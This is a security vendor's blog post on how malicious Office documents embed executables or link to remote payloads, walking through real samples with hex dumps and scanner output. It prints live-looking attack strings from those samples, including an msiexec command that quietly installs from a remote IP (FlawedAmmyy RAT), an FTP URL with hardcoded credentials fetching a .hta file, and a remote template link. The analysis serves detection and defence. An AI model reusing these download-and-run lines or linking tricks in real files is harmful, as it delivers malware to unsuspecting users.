This website uses cookies. By continuing to browse this website, you accept our use of cookies and our Cookie Policy. Close

Our Blog

Assessing risk in Office documents - Part 2: Hide my code or download it?

Share

Tuesday, May 21, 2019

In part 2 of this blog series we focus on the general approach of malicious Office documents to either embed code into the document or to insert links to download the content they need to run. We will investigate different approaches and how they manifest themselves in documents so we can evaluate the risk they pose. We will show live examples using the various methods.

In case you missed part 1, here is the background: Forcepoint Innovation Labs conducted a research project to see if we can evaluate risk associated with Microsoft Office documents without focusing on specific malware families. Anti-virus-engines need to be able to classify a document as malicious to block it, while we want to evaluate the level of risk a document carry without those constraints. Code, or the possibility of getting any code in any form, adds risk. If the level of risk is unacceptable we can then block/quarantine the document on our gateways.

As you progress through the blog series you will build up the knowledge to assess risk instead of depending on a clear AV engine conviction.

Recap of part 1

In part 1 you got an overview of where risk could be found in office documents. We walked through a few examples of how PDF and XML could be used to add risk, and showed you some public tools you could use to analyse them. We briefly saw the output of our research tool.  Let's begin part 2...

 

Introduction to embedding

We often refer to the term OLE2 files. OLE stands for Object Linking and Embedding and OLE2 refers to the second version of OLE. Embedding means you store the content you want to use inside the document. It can be hidden or even obfuscated, but it’s there. When we deal with malicious office code, it’s often the actual downloader which is being embedded. In other cases, the embedded content is a malicious code the attacker intend to use.

How does Word embed an innocent “notepad.exe”?

When you open Word on a blank document you can insert an executable file into it.

To embed this notepad.exe, click on the tab “insert”, choose “Object” and select “Create From File”. Now you can select notepad.exe and click “OK”.

How this will manifest itself in the binary file-format can vary, but most of the time a stream called .Ole10Native is created inside an OLE2 archive.

Let’s start with making an innocent document containing “Hello World!” with an embedded benign “notepad.exe” inserted into it, as we just described.  We save this file as Microsoft Word 2007 (Hello World.docx), OLE2 (Hello World.doc), XML (Hello World.xml) and RTF (Hello World.rtf) so we can analyse what would the internals look like once everything has been decoded. Would we be able to find our clean notepad.exe easily?

Let’s first inspect the “Hello World.docx” in Microsoft Word 2007 format. This is a ZIP archive, and to embed “notepad.exe” we see it uses an oleObject1.bin (OLE2) that again contains an .Ole10Native stream that again contains the notepad.exe (output from our research tool, see part 1 of the blog for a description of the output of the tool):

ScanObject("OLE2_FS" (2:"PE_WIN32",236226,"Hello World.docx|word/embeddings/oleObject1.bin|Root Entry/.Ole10Native|Ole10Native/windows/system32/notepad.exe")

 

If we look at the internals of the OLE2 version (.doc), we see directly an OLE2 file with an  .Ole10Native stream that contains our notepad.exe:

ScanObject("OLE2_FS" (2:"PE_WIN32",236226,"Hello World.doc|Root Entry/ObjectPool/_1617199442/.Ole10Native|Ole10Native/windows/system32/notepad.exe")

 

If we look into the xml version, we see an xmlObject12441 that contains the OLE2 file that also use a .Ole10Native stream to hold notepad.exe:

ScanObject("OLE2_FS" (2:"PE_WIN32",236226,"Hello World.xml|xmlObject12441|Root Entry/.Ole10Native|Ole10Native/windows/system32/notepad.exe")

 

Lastly, when we look at the RTF version we saved, you’ll see several OLE2 archives stored inside the “datastore” and “themedata” datastreams, but this time notepad.exe is found inside “objdata” without the use of an OLE2 structure:

ScanObject("MEM_FS" (2:"PE_WIN32",236032,"Hello World.rtf|objdata_8|HEX|RTFOLEOBJECT|windows/system32/notepad.exe")

 

It’s important to understand how Word can embed binary executables in most of the Office document formats. You need to make sure you understand any combination of it to assess the correct level of risk.

 

.Ole10Native

Now let’s look at something malicious. As an example to walk through, an email is coming inbound for a user. The email has an attachment which needs to be analysed quickly to see if it breaks policy or if it could pose unacceptable risk to the organization. In this case the email contains a Word document called “NEW PO.DOCX”, referred to as Sample 1 (in Appendix B). Just like recent Word documents, it is basically a ZIP archive. We can use any kind of unzip tool to extract it. The contents looks like this:

Archive:  NEW PO.DOCX
  Length      Date    Time    Name
---------  ---------- -----   ----
     1460  1980-01-01 00:00   [Content_Types].xml
      590  1980-01-01 00:00   _rels/.rels
     1094  1980-01-01 00:00   word/_rels/document.xml.rels
     2432  1980-01-01 00:00   word/document.xml
     5040  1980-01-01 00:00   word/media/image1.emf
   144384  1980-01-01 00:00   word/embeddings/oleObject1.bin
     6992  1980-01-01 00:00   word/theme/theme1.xml
     1584  1980-01-01 00:00   word/settings.xml
      260  1980-01-01 00:00   word/webSettings.xml
      629  1980-01-01 00:00   docProps/core.xml
    14840  1980-01-01 00:00   word/styles.xml
     1031  1980-01-01 00:00   word/fontTable.xml
      706  1980-01-01 00:00   docProps/app.xml

At this point we’re not worried about the possibility of XML files containing vulnerabilities, but we do see one interesting file: “word/embeddings/oleObject1.bin”. If we take a closer look at this file, we see it has the header of an OLE2 file (If you want to learn more on how to determine what file-type a given file is based on its content, you can read about the most common headers here, or use a tool called TrID):

This means we need to treat oleObject1.bin as an OLE2 “archive”. You can manually use the same oletools we mentioned in part 1 to extract the content, but for now we use our own research tool to extract all the content from this e-mail (see Appendix B, Sample 1).  Here are the lines we are looking for:

-ScanObject("OLE2_FS" (0:"UNKNOWN",135160,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.Ole10Native")
-ScanObject("OLE2_FS" (7:"ZIP",135026,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.Ole10Native|Ole10Native/Users/user/Desktop/Purchase order.zip")
-ScanObject("ARCHIVE_FS" (2:"PE_WIN32",216064,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.Ole10Native|Ole10Native/Users/user/Desktop/Purchase order.zip|Purchase order.exe")

As you can see, the oleObject1.bin contains several files, one of the most interesting in this context is the .Ole10Native stream. If we look at a hex-dump of the data inside this stream, it will look like this:

.Ole10Native streams contain a header in front of the real content they embed. It’s not too difficult to parse it, see details from Microsoft for more information. At offset 0x85 you see the real file manifesting; in this case it starts with the ZIP header (PK). This means once again we need to use an unzip tool on this extracted binary content to continue the investigation. This will unzip a binary executable called “Purchase order.exe”. The SHA-1 of this binary embedded file is fcff0c73398f084fafcb8aa3677672e44001e3a0 and VirusTotal again agrees that this is up to no good (netWire RAT).

 

Linking

Instead of embedding a binary executable (or anything else) into the document, you can insert a link pointing to some external content. This can for instance be:

  • A remote template to be loaded from a remote server.
  • Hyperlink a user can click on.
  • Use of an URL Moniker to download content.

 

Why would attackers use this approach rather than just embed the malicious content right away? I guess there are several cons and pros an attacker has to consider:

  • Updateable; the downloaded file can be changed at any time if it turns out to be detected by the local anti-virus
  • Scalability & control; monitor who is downloading it. Ability to serve different content to e.g. dynamic analysis systems or by geo location
  • On the other hand, why do an extra download when their code is ALREADY downloaded and running, while the download could be blocked immediately or raise suspicion on the network level?

 

Linking through a remote template

Let’s look at a simple example where the attacker is using a Word document to load a remote template from a remote server (see Appendix B, Sample 2). First we start looking at the content of the file to figure out what file-format is used:

00000000  50 4b 03 04 14 00 00 00  00 00 71 24 78 4a dd fc  |PK........q$xJ..|
00000010  95 37 20 05 00 00 20 05  00 00 13 00 00 00 5b 43  |.7 ... .......[C|
00000020  6f 6e 74 65 6e 74 5f 54  79 70 65 73 5d 2e 78 6d  |ontent_Types].xm|
00000030  6c 3c 3f 78 6d 6c 20 76  65 72 73 69 6f 6e 3d 22  |l<?xml version="|
00000040  31 2e 30 22 20 65 6e 63  6f 64 69 6e 67 3d 22 55  |1.0" encoding="U|

This is a ZIP archive, typical for newer Office documents, when you unzip this file you get the following content:

  Length      Date    Time    Name
---------  ---------- -----   ----
     1312  2017-03-24 04:35   [Content_Types].xml
      716  2017-03-24 04:35   docProps/app.xml
      635  2017-03-24 04:35   docProps/core.xml
     6948  2017-03-24 04:35   word/document.xml
     1295  2017-03-24 04:35   word/fontTable.xml
     1645  2017-03-24 04:35   word/settings.xml
    14781  2017-03-24 04:35   word/styles.xml
      260  2017-03-24 04:35   word/webSettings.xml
     7043  2017-03-24 04:35   word/theme/theme1.xml
      817  2017-03-24 04:35   word/_rels/document.xml.rels
      358  2017-03-24 04:35   word/_rels/settings.xml.rels
      590  2017-03-24 04:35   _rels/.rels

There is no embedded binary files, no macros – so where do we start to look? Let’s start by looking at “word/_rels/settings.xml.rels”. This file is very short, just 358 bytes long and uses the XML format. The data inside looks like this:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
       Target="file:// 184.154.150[.]66/Template.dotm"

You will spot right away that the target for the template is located at an IP address with the name “Template.dotm” and marked as “External”. If you open this document in Word it will attempt to load the template from the given network location, with all the risk associated with using someone else’s unknown template. This specific location no longer serves the template, so the purpose of it cannot be determined anymore. You can see the detection rate of the dropper itself here, but there is no mentioning about the file it did download at the time of analysis.

 

Linking through embedding files in RTF

Another example of documents using download links, is an RTF that doesn’t contain any obfuscation and is easy to follow. This also demonstrates embedding of objects into the Rich Text Format. The file (see Appendix B, Sample 3) starts with your standard {\rtf1 declaration.

{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\.....

We are interested in embedded content that can link outside, so we are searching for destinations that are commonly used. RTF uses keywords that sets the current destination for the data that follows. These are often “objdata”, “datastore” etc. We find the first “objdata” destination:

The first part of the data is a header that is defined here. It’s very easy to parse this structure. Keep in mind that the first DWORD (01050000) can be anything. A trained eye can easily see in the first red marking the length of the name (9) and then the name of the object (ole2link). The second red marking in this case is the first real bytes of the embedded content, an OLE2 file. The length is stored in a DWORD just in front of the data (0x00000e00). The data is just hexadecimal representation of ASCII characters, so a simple script will change it into binary values.

If you use oletools to give you access to the OLE2 archive, you will see the following files inside:

oledir 0.53 - http://decalage.info/python/oletools
OLE directory entries in file ole2link:
----+------+-------+----------------------+-----+-----+-----+--------+-----
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size 
----+------+-------+----------------------+-----+-----+-----+--------+-----
0   |<Used>|Root   |Root Entry            |-    |-    |2    |3       |768  
1   |<Used>|Stream |\x01Ole               |-    |-    |-    |0       |424  
2   |<Used>|Stream |\x01CompObj           |1    |3    |-    |7       |74   
3   |<Used>|Stream |\x03ObjInfo           |-    |4    |-    |9       |6    
4   |<Used>|Stream |\x02OlePres000        |-    |-    |-    |A       |126  
5   |unused|Empty  |                      |-    |-    |-    |0       |0    
6   |unused|Empty  |                      |-    |-    |-    |0       |0    
7   |unused|Empty  |                      |-    |-    |-    |0       |0    
----+----------------------------+------+----------------------------------

What interests us now, is the .Ole stream. This stream could indicate that there is a URL Moniker used to download external content. If we view the .Ole2 file itself, it looks like this:

Clearly you can see with the naked eye that there is a URL here. It is even using the FTP protocol with a hardcoded username and password to download content. The file it downloads indicate the external content to be a .HTA file, possibly to exploit the CVE-2017-0199 vulnerability. To parse this structure you need to understand how the .Ole2 structure works, you can find Microsoft’s documentation here, searching for “Moniker stream”. The CLSID {79eac9e0-baf9-11ce-8c82-00aa004ba90b} used (in red) specify that it’s indeed using a “URL Moniker”. It could also be using different types, such as a “script moniker” {06290BD3-48AA-11D2-8432-006008C3FBFC} etc.

As previously showcased, our research tool can automate the entire job and produce the output as per Appendix B, Sample 3. Here is the important part:

-ScanObject("URL_FS" (0:"UNKNOWN",0,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7|RTFOLEOBJECT|ole2link|Root Entry/.Ole|ftp://lhishaw:f3pr9wre@lailahishaw.com/httpdocs/template.hta")

It shows us the complete path: RTF file -> objdata -> “ole2link” -> Root Entry -> .Ole2 file with the link. We will be covering RTF thoroughly in part 3 of this blog series when we deal with exploits.

 

Different macro linking through MSI

Sometimes there isn’t any obfuscation, but you have to look at the right place to find the malicious part. In this example (see Appendix B, Sample 4) the file we are analysing is another OLE2 archive. Using oletools we see that this OLE2 archive contains the following streams:

oledir 0.53 - http://decalage.info/python/oletools
OLE directory entries in file f286adbcb03c34cd05b466a18b7a0c087381d178:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size 
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |<Used>|Root   |Root Entry            |-    |-    |2    |FFFFFFFE|0    
1   |<Used>|Stream |Workbook              |-    |-    |-    |0       |100239
2   |<Used>|Stream |\x05SummaryInformation|1    |3    |-    |C4      |4096 
3   |<Used>|Stream |\x05DocumentSummaryInf|-    |-    |-    |CC      |4096 
    |      |       |ormation              |     |     |     |        |     
----+----------------------------+------+--------------------------------------

There are no macros, no embedded content and no links. Surely this one must be ok as it doesn’t look like there is much risk associated with it? The secret lies in the Workbook stream. This file is about 100 kb and is quite simple to parse. It starts like this:

00000000  09 08 10 00 00 06 05 00  54 38 cd 07 c9 00 02 00  |........T8......|
00000010  06 08 00 00 e1 00 02 00  b0 04 c1 00 02 00 00 00  |................|
00000020  e2 00 00 00 5c 00 70 00  01 00 00 31 20 20 20 20  |....\.p....1    |
00000030  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |
00000040  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |
00000050  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |
00000060  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |
00000070  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |
00000080  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20  |                |
00000090  20 20 20 20 20 20 20 20  42 00 02 00 b0 04 61 01  |        B.....a.|
000000a0  02 00 00 00 c0 01 00 00  3d 01 04 00 06 00 03 00  |........=.......|
000000b0  ba 01 13 00 08 00 01 2d  04 42 04 30 04 1a 04 3d  |.......-.B.0...=|

You can find Microsoft’s documentation of the Workbook stream here.  Record 0x3c is an interesting one, which means it extends the previous one – so you’ll need to parse that record carefully. Once you enumerate the records – you’ll find several interesting records that contains suspicious content. The examples I’ll show is record 0xFC at offset 89277 and record 0x207 at offset 93494 (offsets are in the actual Workbook stream, not the OLE2 archive)

DUMPING OBJECT Type_fc_89277, size 111 bytes
     0 : 06 00 00 00 06 00 00 00 06 00 00 4D 61 63 72 6F  | ...........Macro
    10 : 31 06 00 00 4D 61 63 72 6F 32 05 00 00 6D 73 69  | 1...Macro2...msi
    20 : 65 78 11 00 00 65 63 2E 65 78 65 20 52 45 54 55  | ex...ec.exe RETU
    30 : 52 4E 3D 31 38 35 23 00 00 20 2F 69 20 68 74 74  | RN=185#.. /i htt
    40 : 70 3A 2F 2F 31 39 35 2E 31 32 33 2E 32 30 39 2E  | p://195.123.209.
    50 : 31 36 39 2F 63 6F 6E 74 72 6F 6C 20 10 00 00 2F  | 169/control .../
    60 : 71 20 6B 73 77 3D 27 25 54 45 4D 50 25 27 20     | q ksw='%TEMP%'

DUMPING OBJECT Type_207_93494, size 76 bytes
     0 : 49 00 00 6D 73 69 65 78 65 63 2E 65 78 65 20 52  | I..msiexec.exe R
    10 : 45 54 55 52 4E 3D 31 38 35 20 2F 69 20 68 74 74  | ETURN=185 /i htt
    20 : 70 3A 2F 2F 31 39 35 2E 31 32 33 2E 32 30 39 2E  | p://195.123.209.
    30 : 31 36 39 2F 63 6F 6E 74 72 6F 6C 20 2F 71 20 6B  | 169/control /q k
    40 : 73 77 3D 27 25 54 45 4D 50 25 27 20              | sw='%TEMP%'

As you can see, this embedded record does indeed point to something that doesn’t look good (FlawedAmmyy RAT). Just like before, our research tool decodes this automatically and extracts the data we need to have for evaluating risk:

-ScanObject("MEM_FS" (0:"UNKNOWN",76,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_207_93494")
-ScanObject("URL_FS" (0:"UNKNOWN",0,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|195.123.209.169/control")

 

What is next in Part 3?

In part 3 of this blog series we’ll investigate RTF in more detail, which is a commonly used document format abused by malicious actors to attack organizations. We’ll examine different obfuscation techniques and how to find some common exploits hidden deep within the RTF structure!

[UPDATE] 28 May 2019: Part 3 is now available.

 

Appendix A - hashes

Sample 1 – 7decf4790eb24e0a1e59c8e06c4c57e33bfb7b53
Sample 2 - 67175f1de3a911958e4c075336160462df3ea7b1
Sample 3 - 7af8dd464ec3f88ff63fecd245205185d50111b0
Sample 4 - f286adbcb03c34cd05b466a18b7a0c087381d178

Appendix B – tool output

Full output of Sample 1:

-ScanObject("GENERIC_FS" (13:"EML",207782,"ENTIRE_MESSAGE901.msg")
       -ScanObject("EML_FS" (0:"UNKNOWN",8,"ENTIRE_MESSAGE901.msg|ATTACHMENT_1357")
       -ScanObject("EML_FS" (0:"UNKNOWN",1748,"ENTIRE_MESSAGE901.msg|ATTACHMENT_1817")
       -ScanObject("EML_FS" (7:"ZIP",149864,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX")
              -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
              -ScanObject("ARCHIVE_FS" (5:"XML",590,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|_rels/.rels")
              -ScanObject("ARCHIVE_FS" (5:"XML",1094,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/_rels/document.xml.rels")
              -ScanObject("ARCHIVE_FS" (5:"XML",2432,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/document.xml")
              -ScanObject("ARCHIVE_FS" (23:"EMF",5040,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/media/image1.emf")
              -ScanObject("ARCHIVE_FS" (1:"OLE2",144384,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",76,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.CompObj")
                     -ScanObject("OLE2_FS" (23:"EMF",5040,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.EPRINT")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.ObjInfo")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",135160,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.Ole10Native")
                           -ScanObject("OLE2_FS" (7:"ZIP",135026,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.Ole10Native|Ole10Native/Users/user/Desktop/Purchase order.zip")
                                  -ScanObject("ARCHIVE_FS" (2:"PE_WIN32",216064,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/embeddings/oleObject1.bin|Root Entry/.Ole10Native|Ole10Native/Users/user/Desktop/Purchase order.zip|Purchase order.exe")
              -ScanObject("ARCHIVE_FS" (5:"XML",6992,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/theme/theme1.xml")
              -ScanObject("ARCHIVE_FS" (5:"XML",1584,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/settings.xml")
              -ScanObject("ARCHIVE_FS" (5:"XML",260,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/webSettings.xml")
              -ScanObject("ARCHIVE_FS" (5:"XML",629,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|docProps/core.xml")
              -ScanObject("ARCHIVE_FS" (5:"XML",14840,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/styles.xml")
              -ScanObject("ARCHIVE_FS" (5:"XML",1031,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|word/fontTable.xml")
              -ScanObject("ARCHIVE_FS" (5:"XML",706,"ENTIRE_MESSAGE901.msg|NEW PO.DOCX|docProps/app.xml")

Full output of sample 2:

-ScanObject("GENERIC_FS" (7:"ZIP",37788,"67175f1de3a911958e4c075336160462df3ea7b1")
       -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",716,"67175f1de3a911958e4c075336160462df3ea7b1|docProps/app.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",635,"67175f1de3a911958e4c075336160462df3ea7b1|docProps/core.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",6948,"67175f1de3a911958e4c075336160462df3ea7b1|word/document.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",1295,"67175f1de3a911958e4c075336160462df3ea7b1|word/fontTable.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",1645,"67175f1de3a911958e4c075336160462df3ea7b1|word/settings.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",14781,"67175f1de3a911958e4c075336160462df3ea7b1|word/styles.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",260,"67175f1de3a911958e4c075336160462df3ea7b1|word/webSettings.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",7043,"67175f1de3a911958e4c075336160462df3ea7b1|word/theme/theme1.xml")
       -ScanObject("ARCHIVE_FS" (5:"XML",817,"67175f1de3a911958e4c075336160462df3ea7b1|word/_rels/document.xml.rels")
       -ScanObject("ARCHIVE_FS" (5:"XML",358,"67175f1de3a911958e4c075336160462df3ea7b1|word/_rels/settings.xml.rels")
       -ScanObject("ARCHIVE_FS" (5:"XML",590,"67175f1de3a911958e4c075336160462df3ea7b1|_rels/.rels")

Full output of Sample 3:

-ScanObject("GENERIC_FS" (10:"RTF",50284,"7af8dd464ec3f88ff63fecd245205185d50111b0")
       -ScanObject("GENERIC_FS" (31:"HEX",7280,"7af8dd464ec3f88ff63fecd245205185d50111b0|datastore_0")
              -ScanObject("MEM_FS" (32:"OLEOBJ",3640,"7af8dd464ec3f88ff63fecd245205185d50111b0|datastore_0|HEX")
                     -ScanObject("MEM_FS" (1:"OLE2",3584,"7af8dd464ec3f88ff63fecd245205185d50111b0|datastore_0|HEX|RTFOLEOBJECT|msxml2.saxxmlreader.6.0")
                           -ScanObject("OLE2_FS" (21:"TEXT",205,"7af8dd464ec3f88ff63fecd245205185d50111b0|datastore_0|HEX|RTFOLEOBJECT|msxml2.saxxmlreader.6.0|Root Entry/MsoDataStore/.D.....DOU..J...F.1..A==/Item")
                           -ScanObject("OLE2_FS" (5:"XML",341,"7af8dd464ec3f88ff63fecd245205185d50111b0|datastore_0|HEX|RTFOLEOBJECT|msxml2.saxxmlreader.6.0|Root Entry/MsoDataStore/.D.....DOU..J...F.1..A==/Properties")
       -ScanObject("GENERIC_FS" (21:"TEXT",2521,"7af8dd464ec3f88ff63fecd245205185d50111b0|lsdlockedexcept_1")
       -ScanObject("GENERIC_FS" (31:"HEX",628,"7af8dd464ec3f88ff63fecd245205185d50111b0|colorschememapping_2")
              -ScanObject("MEM_FS" (5:"XML",314,"7af8dd464ec3f88ff63fecd245205185d50111b0|colorschememapping_2|HEX")
       -ScanObject("GENERIC_FS" (31:"HEX",6208,"7af8dd464ec3f88ff63fecd245205185d50111b0|themedata_3")
              -ScanObject("MEM_FS" (7:"ZIP",3104,"7af8dd464ec3f88ff63fecd245205185d50111b0|themedata_3|HEX")
                     -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",310,"7af8dd464ec3f88ff63fecd245205185d50111b0|themedata_3|HEX|_rels/.rels")
                     -ScanObject("ARCHIVE_FS" (5:"XML",138,"7af8dd464ec3f88ff63fecd245205185d50111b0|themedata_3|HEX|theme/theme/themeManager.xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",7076,"7af8dd464ec3f88ff63fecd245205185d50111b0|themedata_3|HEX|theme/theme/theme1.xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",283,"7af8dd464ec3f88ff63fecd245205185d50111b0|themedata_3|HEX|theme/theme/_rels/themeManager.xml.rels")
       -ScanObject("GENERIC_FS" (21:"TEXT",5,"7af8dd464ec3f88ff63fecd245205185d50111b0|pntxtb_4")
       -ScanObject("GENERIC_FS" (21:"TEXT",9,"7af8dd464ec3f88ff63fecd245205185d50111b0|pntxta_5")
       -ScanObject("GENERIC_FS" (21:"TEXT",78,"7af8dd464ec3f88ff63fecd245205185d50111b0|result_6")
       -ScanObject("GENERIC_FS" (31:"HEX",9404,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7")
              -ScanObject("MEM_FS" (32:"OLEOBJ",4702,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7|HEX")
                     -ScanObject("MEM_FS" (1:"OLE2",3584,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7|HEX|RTFOLEOBJECT|ole2link")
                           -ScanObject("OLE2_FS" (0:"UNKNOWN",74,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7|HEX|RTFOLEOBJECT|ole2link|Root Entry/.CompObj")
                           -ScanObject("OLE2_FS" (0:"UNKNOWN",424,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7|HEX|RTFOLEOBJECT|ole2link|Root Entry/.Ole")
                           -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7|HEX|RTFOLEOBJECT|ole2link|Root Entry/.ObjInfo")
                           -ScanObject("OLE2_FS" (0:"UNKNOWN",126,"7af8dd464ec3f88ff63fecd245205185d50111b0|objdata_7|HEX|RTFOLEOBJECT|ole2link|Root Entry/.OlePres000")
       -ScanObject("GENERIC_FS" (27:"BASE64",8,"7af8dd464ec3f88ff63fecd245205185d50111b0|objclass_8")
              -ScanObject("MEM_FS" (0:"UNKNOWN",6,"7af8dd464ec3f88ff63fecd245205185d50111b0|objclass_8|B64")

Example output of Sample 4:

-ScanObject("GENERIC_FS" (1:"OLE2",110592,"f286adbcb03c34cd05b466a18b7a0c087381d178")
                -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/.SummaryInformation")
                -ScanObject("OLE2_FS" (0:"UNKNOWN",100239,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",112,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_5c_40")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",19,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_1ba_180")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",18,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_3d_239")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",34,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_297")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",34,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_335")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",34,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_373")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",34,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_411")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",34,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_449")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",34,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_487")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",30,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_525")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",30,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_559")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",30,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_593")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",30,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_627")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",30,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_661")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",30,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_695")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",30,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_31_729")
                                ....
                                -ScanObject("MEM_FS" (0:"UNKNOWN",67500,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_eb_21725")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",111,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_fc_89277")
                                                                -ScanObject("URL_FS" (0:"UNKNOWN",0,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|195.123.209.169/control")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",22,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_863_89406")
                                -ScanObject("MEM_FS" (7:"ZIP",3165,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_896_89432")
                                                -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                                                -ScanObject("ARCHIVE_FS" (5:"XML",310,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_896_89432|_rels/.rels")
                                                -ScanObject("ARCHIVE_FS" (5:"XML",138,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_896_89432|theme/theme/themeManager.xml")
